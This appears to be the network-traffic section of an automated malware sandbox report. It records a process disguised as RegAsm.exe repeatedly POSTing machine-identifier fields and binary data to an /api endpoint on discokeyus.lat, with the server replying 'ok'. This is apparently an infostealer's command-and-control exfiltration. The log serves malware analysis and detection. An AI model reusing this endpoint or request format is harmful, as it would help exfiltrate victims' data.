2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 34 34 62 36 0d 0a 65 77 4e 5a 35 5a 79 43 71 49 56 68 4b 36 6f 43 47 6e 79 38 75 64 6c 49 78 50 31 44 78 74 73 4a 62 46 45 44 65 7a 30 33 43 65 66 4b 77 49 6b 46 76 43 49 70 59 65 44 76 79 72 62 36 37 42 6a 63 58 52 77 77 36 62 4d 33 58 78 79 6f 67 77 4f 4b 6e 4c 63 74 39 46 6f 77 36 54 55 4e 42 74 67 56 67 55 74 4c 35 74 34 4a 2f 4c 79 39 6d 49 54 4e 77 39 62 4c 4b 53 77 68 6f 35 74 4e 64 78 6e 58 32 68 43 35 56 52 79 79 61 52 47 51 72 38 75 6d 32 6c 79 6f 69 46 6d 73 4e 48 77 33 51 31 38 62 66 47 46 79 65 76 6e 55 79 65 66 71 34 48 69 78 66 5a 59 34 64 57 43 76 6a 35 4f 65 44 4e 6a 4d 4c 51 6a 6b 72 59 4d 47 6d 38 6e 63 45 64 50 36 7a 56 64 5a 4e 69 72 51 71 59 57 63 6f 6f 6b 52 59 4d 39 62 64 72 71 34 66 46 68 64 4f 62 41 49 4e 30 51 72 79 43 32 68 34 Data Ascii: 44b6ewNZ5ZyCqIVhK6oCGny8udlIxP1DxtsJbFEDez03CefKwIkFvCIpYeDvyrb67BjcXRww6bM3XxyogwOKnLct9Fow6TUNBtgVgUtL5t4J/Ly9mITNw9bLKSwho5tNdxnX2hC5VRyyaRGQr8um2lyoiFmsNHw3Q18bfGFyevnUyefq4HixfZY4dWCvj5OeDNjMLQjkrYMGm8ncEdP6zVdZNirQqYWcookRYM9bdrq4fFhdObAIN0QryC2h4
2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 39 31 33 75 45 44 46 46 2b 6b 75 69 42 78 4e 36 2f 64 34 34 4d 43 48 68 59 7a 44 53 74 63 77 62 72 32 62 78 42 6b 33 75 74 68 30 6d 58 43 6d 42 70 68 57 7a 53 57 53 47 51 66 34 76 57 32 70 77 59 66 47 31 34 55 41 6c 58 52 71 71 64 4b 51 56 42 65 7a 31 48 57 64 63 37 45 48 33 52 6d 47 49 35 67 57 54 61 79 76 63 62 66 41 6c 49 76 4e 77 30 66 58 64 44 58 78 6d 4e 6f 52 4f 4c 72 56 66 4a 6c 38 71 67 43 59 52 63 34 72 6d 52 6f 46 38 62 5a 6e 70 63 71 4d 7a 74 65 52 55 74 67 77 59 37 33 53 68 6c 51 78 70 70 38 68 33 56 57 33 41 34 31 52 78 57 32 42 57 42 53 30 76 6d 33 67 6e 38 76 46 32 6f 39 4c 33 44 39 6d 74 5a 62 49 47 54 32 77 30 58 43 52 65 4b 77 48 6a 31 72 44 4a 5a 51 66 43 50 69 30 59 72 4c 45 69 6f 57 61 77 30 66 44 64 44 58 78 74 66 73 6a 46 66 37 41 Data Ascii: 913uEDFF+kuiBxN6/d44MCHhYzDStcwbr2bxBk3uth0mXCmBphWzSWSGQf4vW2pwYfG14UAlXRqqdKQVBez1HWdc7EH3RmGI5gWTayvcbfAlIvNw0fXdDXxmNoROLrVfJl8qgCYRc4rmRoF8bZnpcqMzteRUtgwY73ShlQxpp8h3VW3A41RxW2BWBS0vm3gn8vF2o9L3D9mtZbIGT2w0XCReKwHj1rDJZQfCPi0YrLEioWaw0fDdDXxtfsjFf7A
2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 63 59 33 51 2b 47 41 5a 30 5a 42 72 53 6d 4c 37 6d 48 6a 4d 6d 55 32 77 44 63 50 47 57 2f 6b 63 34 66 4f 72 4c 65 63 4a 74 31 71 41 65 53 55 4d 38 71 6e 68 41 66 38 37 52 6f 6f 4d 79 43 7a 39 43 43 53 35 74 36 4c 62 61 4b 69 45 78 32 6a 4e 68 76 6a 58 50 67 48 39 4e 4f 68 69 71 53 56 6c 57 30 74 48 4f 68 77 70 6e 42 32 34 68 53 30 44 4a 74 74 49 44 50 47 44 79 78 33 48 47 51 63 36 67 53 6e 56 72 47 50 34 77 51 42 76 72 35 4c 2b 44 41 6b 34 57 4d 77 33 48 4d 50 79 32 75 33 4e 46 55 4d 62 4b 66 49 64 31 7a 71 67 32 54 52 63 49 72 6c 52 55 44 2f 4c 78 70 70 4d 32 47 79 74 2b 4a 53 64 4d 30 59 72 53 61 77 78 49 34 76 39 6c 31 6b 44 44 75 51 4a 70 50 68 6e 58 65 4d 52 66 35 76 33 61 78 38 6f 7a 46 68 63 4e 66 6c 53 30 74 74 70 36 49 54 48 61 7a 30 33 4f 51 64 Data Ascii: cY3Q+GAZ0ZBrSmL7mHjMmU2wDcPGW/kc4fOrLecJt1qAeSUM8qnhAf87RooMyCz9CCS5t6LbaKiEx2jNhvjXPgH9NOhiqSVlW0tHOhwpnB24hS0DJttIDPGDyx3HGQc6gSnVrGP4wQBvr5L+DAk4WMw3HMPy2u3NFUMbKfId1zqg2TRcIrlRUD/LxppM2Gyt+JSdM0YrSawxI4v9l1kDDuQJpPhnXeMRf5v3ax8ozFhcNflS0ttp6ITHaz03OQd
2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 58 32 57 4f 48 56 67 72 34 2b 54 6e 67 79 59 62 44 31 59 4a 49 30 7a 52 72 75 35 62 4c 48 54 57 35 31 6e 2b 57 63 36 6f 50 6d 6c 48 43 4c 5a 55 52 41 2f 4b 38 61 71 6d 48 78 59 58 54 6d 77 43 44 64 45 75 53 67 4e 6f 6d 4f 4c 33 45 4f 59 49 2b 75 55 43 61 57 34 5a 31 33 68 30 46 2b 36 74 6b 71 63 2b 50 7a 4e 53 48 53 74 59 7a 62 62 53 66 7a 52 41 34 75 74 68 35 6b 58 2b 6e 43 4a 4a 54 78 69 4c 65 57 45 33 7a 6f 53 48 34 68 36 76 4f 77 71 4a 4f 30 43 59 74 72 74 7a 52 56 44 47 79 6e 79 48 64 66 71 6b 42 6c 56 6e 4b 4a 5a 6f 45 44 66 2b 77 62 71 48 49 69 38 62 56 69 55 6a 4a 4d 6d 32 36 6d 73 38 63 4d 72 44 4e 65 4a 49 77 37 6b 43 61 54 34 5a 31 33 69 63 62 38 37 35 75 34 75 36 4d 33 74 57 4a 51 39 41 34 4c 61 37 63 30 56 51 78 73 70 38 68 33 58 32 73 44 5a Data Ascii: X2WOHVgr4+TngyYbD1YJI0zRru5bLHTW51n+Wc6oPmlHCLZURA/K8aqmHxYXTmwCDdEuSgNomOL3EOYI+uUCaW4Z13h0F+6tkqc+PzNSHStYzbbSfzRA4uth5kX+nCJJTxiLeWE3zoSH4h6vOwqJO0CYtrtzRVDGynyHdfqkBlVnKJZoEDf+wbqHIi8bViUjJMm26ms8cMrDNeJIw7kCaT4Z13icb875u4u6M3tWJQ9A4La7c0VQxsp8h3X2sDZ
2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 6d 52 70 4e 72 50 6c 71 72 73 4b 4b 79 64 36 45 54 73 6b 31 5a 37 32 54 7a 78 4d 39 72 4e 52 72 6c 6e 69 6a 44 70 56 65 78 69 4f 65 46 77 44 30 2b 53 2f 67 77 4a 4f 46 6a 4d 4e 6c 2b 43 4e 37 75 39 44 72 41 79 43 30 32 48 57 4c 65 36 45 44 69 31 72 57 62 64 42 57 48 50 4f 6f 49 66 6a 52 6d 39 4c 54 6e 41 37 43 64 47 71 39 30 70 42 55 50 62 48 52 64 4a 5a 30 71 51 57 56 56 4d 4d 6f 6c 42 6f 42 39 62 46 6f 71 73 4b 4f 77 39 36 41 54 74 51 31 59 62 57 62 78 68 31 32 38 4a 39 2b 68 54 44 34 51 4b 74 48 77 54 57 54 42 6b 2f 47 75 6e 43 78 30 6f 62 56 30 73 46 76 32 44 68 75 74 4a 58 59 56 43 6e 77 78 6a 6d 61 66 4f 42 59 33 56 66 43 49 5a 30 52 41 2f 75 30 62 71 66 4d 68 4d 2f 61 6b 55 2f 65 50 47 47 35 6e 39 6f 65 50 4b 7a 57 63 4a 42 2b 71 42 4b 65 46 34 68 Data Ascii: mRpNrPlqrsKKyd6ETsk1Z72TzxM9rNRrlnijDpVexiOeFwD0+S/gwJOFjMNl+CN7u9DrAyC02HWLe6EDi1rWbdBWHPOoIfjRm9LTnA7CdGq90pBUPbHRdJZ0qQWVVMMolBoB9bFoqsKOw96ATtQ1YbWbxh128J9+hTD4QKtHwTWTBk/GunCx0obV0sFv2DhutJXYVCnwxjmafOBY3VfCIZ0RA/u0bqfMhM/akU/ePGG5n9oePKzWcJB+qBKeF4h
2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 2f 6d 34 59 71 36 46 75 74 50 5a 6b 30 50 65 4d 31 4f 50 6e 4d 38 41 4d 62 44 5a 65 64 30 2b 34 41 2f 64 44 2f 39 74 31 6c 59 79 75 76 6c 35 34 4a 2f 4c 38 4e 65 4e 54 74 77 69 66 50 79 78 33 77 49 38 70 5a 31 66 6d 6d 47 70 46 70 42 46 68 6d 50 65 45 45 32 73 36 53 2f 67 77 35 71 46 6a 4e 4d 53 67 47 45 2b 35 73 4b 61 43 33 69 6e 6e 32 2f 64 4b 50 4a 4f 33 55 57 47 64 64 35 52 44 75 61 72 5a 36 50 52 69 49 4c 71 76 57 44 51 49 6d 79 38 6d 63 51 71 43 4b 76 63 64 35 4e 33 74 68 48 64 47 59 59 69 33 6b 34 30 74 50 45 68 6e 34 6e 4c 33 5a 54 62 41 4f 34 33 59 37 2b 56 33 67 56 37 6e 74 52 76 6e 48 32 72 44 4e 39 57 79 7a 32 5a 56 6b 4f 30 76 79 48 34 6c 38 57 46 30 4a 49 41 67 32 51 2f 36 73 65 62 51 32 62 73 77 44 65 45 4d 4c 5a 41 78 51 57 49 62 59 78 57 Data Ascii: /m4Yq6FutPZk0PeM1OPnM8AMbDZed0+4A/dD/9t1lYyuvl54J/L8NeNTtwifPyx3wI8pZ1fmmGpFpBFhmPeEE2s6S/gw5qFjNMSgGE+5sKaC3inn2/dKPJO3UWGdd5RDuarZ6PRiILqvWDQImy8mcQqCKvcd5N3thHdGYYi3k40tPEhn4nL3ZTbAO43Y7+V3gV7ntRvnH2rDN9Wyz2ZVkO0vyH4l8WF0JIAg2Q/6sebQ2bswDeEMLZAxQWIbYxW
2024-12-20 06:18:08 UTC	1369	IN	Data Raw: 65 78 69 72 37 47 78 59 42 41 30 48 51 6a 38 5a 53 49 54 47 54 77 6e 33 32 4d 4d 50 68 51 7a 77 79 54 66 73 6c 47 58 2b 76 33 65 4f 44 52 79 35 32 47 7a 51 44 4a 64 44 58 78 31 63 73 47 4a 4c 6a 63 62 35 34 33 6e 6a 36 37 56 4d 45 72 6e 52 67 61 35 66 74 4f 6f 38 79 48 79 64 4f 56 66 75 55 68 62 72 2b 63 7a 77 49 6e 2f 70 45 35 6b 6a 44 34 4f 64 31 47 7a 43 72 53 58 6b 48 6c 71 6d 2b 72 30 59 79 46 36 38 30 41 77 33 51 31 38 61 66 4c 47 6a 69 35 79 57 6a 51 56 71 4d 48 6d 31 54 49 4f 6f 39 57 51 37 53 2f 49 66 69 56 78 59 58 51 6b 67 43 44 5a 44 2f 71 78 35 74 44 5a 75 7a 41 4e 34 51 77 74 6b 44 46 42 49 68 74 6a 46 5a 56 74 50 35 76 72 63 61 49 79 39 65 52 55 74 30 33 65 37 4c 56 39 69 6f 54 73 39 4a 38 6b 33 65 65 50 72 78 64 31 69 43 52 45 54 50 4b 6a Data Ascii: exir7GxYBA0HQj8ZSITGTwn32MMPhQzwyTfslGX+v3eODRy52GzQDJdDXx1csGJLjcb543nj67VMErnRga5ftOo8yHydOVfuUhbr+czwIn/pE5kjD4Od1GzCrSXkHlqm+r0YyF680Aw3Q18afLGji5yWjQVqMHm1TIOo9WQ7S/IfiVxYXQkgCDZD/qx5tDZuzAN4QwtkDFBIhtjFZVtP5vrcaIy9eRUt03e7LV9ioTs9J8k3eePrxd1iCRETPKj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:10 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H0SN1JZ0BCB5Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18131 Host: discokeyus.lat
2024-12-20 06:18:10 UTC	15331	OUT	Data Raw: 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 48 30 53 4e 31 4a 5a 30 42 43 42 35 5a Data Ascii: --H0SN1JZ0BCB5ZContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--H0SN1JZ0BCB5ZContent-Disposition: form-data; name="pid"2--H0SN1JZ0BCB5ZContent-Disposition: form-data; name="lid"DUkgLv--tax--H0SN1JZ0BCB5Z
2024-12-20 06:18:10 UTC	2800	OUT	Data Raw: 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 Data Ascii: ^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTw
2024-12-20 06:18:11 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e1ft2u16dg0qtf3g3aqun50vei; expires=Tue, 15 Apr 2025 00:04:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9udr7feBRQgmhvBrrtGDRMQYz9M84CphRGCaRL7vt4psr8Ep7o%2BA3DuauZvzQdU8KdEFPR2P2aBrCFhA2D64PqHdzwvAJdUsfDFZrEhUEC08uRYuBROa82%2B0HO9A5TGwfQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d83767aee433a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2529&min_rtt=2492&rtt_var=961&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19086&delivery_rate=1171749&cwnd=242&unsent_bytes=0&cid=56c3c644b7c88df7&ts=1246&x=0"
2024-12-20 06:18:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-20 06:18:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:12 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U74AXY2RUB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8734 Host: discokeyus.lat
2024-12-20 06:18:12 UTC	8734	OUT	Data Raw: 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 55 37 34 41 58 59 32 52 55 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --U74AXY2RUBContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--U74AXY2RUBContent-Disposition: form-data; name="pid"2--U74AXY2RUBContent-Disposition: form-data; name="lid"DUkgLv--tax--U74AXY2RUBContent-Di
2024-12-20 06:18:13 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bddomfroonioi9hu3371kumeif; expires=Tue, 15 Apr 2025 00:04:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2w1YWyZf8d1E756P6JcEsjis5tQnWv0E0pm%2BvcLlKc3t1Lua9yoGxZT0Zg%2FnfURzPIeMerEkQ%2FDDOyhQ84iSY5q6jX%2BggD2l3ckfUf8t48yJopSJZrh6W5OODcce7OB2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d8385ff304205-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=1770&rtt_var=2816&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9663&delivery_rate=1649717&cwnd=252&unsent_bytes=0&cid=cb4a5f36cedbdd59&ts=849&x=0"
2024-12-20 06:18:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-20 06:18:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:14 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HOFL2KSKOEI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20393 Host: discokeyus.lat
2024-12-20 06:18:14 UTC	15331	OUT	Data Raw: 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 48 4f 46 4c 32 4b 53 4b 4f 45 49 0d 0a 43 6f 6e 74 65 6e Data Ascii: --HOFL2KSKOEIContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--HOFL2KSKOEIContent-Disposition: form-data; name="pid"3--HOFL2KSKOEIContent-Disposition: form-data; name="lid"DUkgLv--tax--HOFL2KSKOEIConten
2024-12-20 06:18:14 UTC	5062	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 Data Ascii: lrQMn 64F6(X&7~`aO@d
2024-12-20 06:18:15 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qtd38a6bo20tke4kl412q9u9n1; expires=Tue, 15 Apr 2025 00:04:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxkFLfSJjbJQgV9aUoGx%2FTlEE%2Fd1bbT%2Fc775ApWvDjJsBeNNPAn7YUnMbdr9ur3Z1e7tJb8tFmoev7igW0HVXI7QygeTvRH1oBG1lKMYxTUbgsA3FPF3Tyl8DI47LRYTuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d83935e5942fc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=2512&rtt_var=949&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21346&delivery_rate=1149606&cwnd=187&unsent_bytes=0&cid=d3e5c07b78a8b0f2&ts=978&x=0"
2024-12-20 06:18:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-20 06:18:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:17 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JC8R6DT9XAQROPUH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1238 Host: discokeyus.lat
2024-12-20 06:18:17 UTC	1238	OUT	Data Raw: 2d 2d 4a 43 38 52 36 44 54 39 58 41 51 52 4f 50 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 34 42 43 39 33 38 32 41 38 38 39 45 39 34 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 43 38 52 36 44 54 39 58 41 51 52 4f 50 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 43 38 52 36 44 54 39 58 41 51 52 4f 50 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 74 61 78 0d 0a 2d 2d 4a 43 38 52 Data Ascii: --JC8R6DT9XAQROPUHContent-Disposition: form-data; name="hwid"E4BC9382A889E941AC8923850305D13E--JC8R6DT9XAQROPUHContent-Disposition: form-data; name="pid"1--JC8R6DT9XAQROPUHContent-Disposition: form-data; name="lid"DUkgLv--tax--JC8R
2024-12-20 06:18:17 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rqsu4canolah2aln9nnist9tn8; expires=Tue, 15 Apr 2025 00:04:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbXaOvbuTNZbf1%2Bw31T9UFahEu0MtNcdr4T%2BaLH3H7Nc8hJk%2BL3BOi7R3NIA5gJbbuwrmcCcraOr2%2F0124LZxp6qPDWtAVlG3SkqkKW9ismkC%2BGa8fy0qut3CLxe9PlIgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d83a1cd478c77-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1828&rtt_var=686&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2151&delivery_rate=1593886&cwnd=244&unsent_bytes=0&cid=dae31b787b71f2a4&ts=767&x=0"
